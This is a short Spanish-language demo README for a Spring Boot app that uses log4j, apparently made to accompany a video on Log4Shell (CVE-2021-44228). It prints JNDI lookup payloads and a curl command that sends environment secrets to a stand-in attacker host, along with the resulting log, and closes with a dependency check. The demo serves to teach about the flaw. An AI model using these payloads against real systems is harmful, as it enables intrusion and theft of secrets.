
Log4Shell (CVE-2021-44228) es una vulnerabilidad de día cero en Log4j
Descubierta: 24 de noviembre de 2021
Parcheada: 6 de diciembre de 2021
Haz clic abajo para ver el video en YouTube
Esta aplicación de ejemplo es una aplicación Spring Boot, usa log4j como marco de registro y se ejecuta con las siguientes variables de entorno en el puerto 8080 en localhost.
Mira la explicación en video:
Variables de entorno
key=jason.bourne;secret=Treadstone
Parámetro:
value=${jndi:ldap://some-random-hacking-site.com}

Usando la siguiente cadena puedes obtener variables de entorno
value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}
curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'
2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
mvn dependency:tree
Asegúrate de que ninguno de los JARs dependientes apunte a una versión vulnerable de log4j.
Lista de reproducción de seguridad de Techflix en YouTube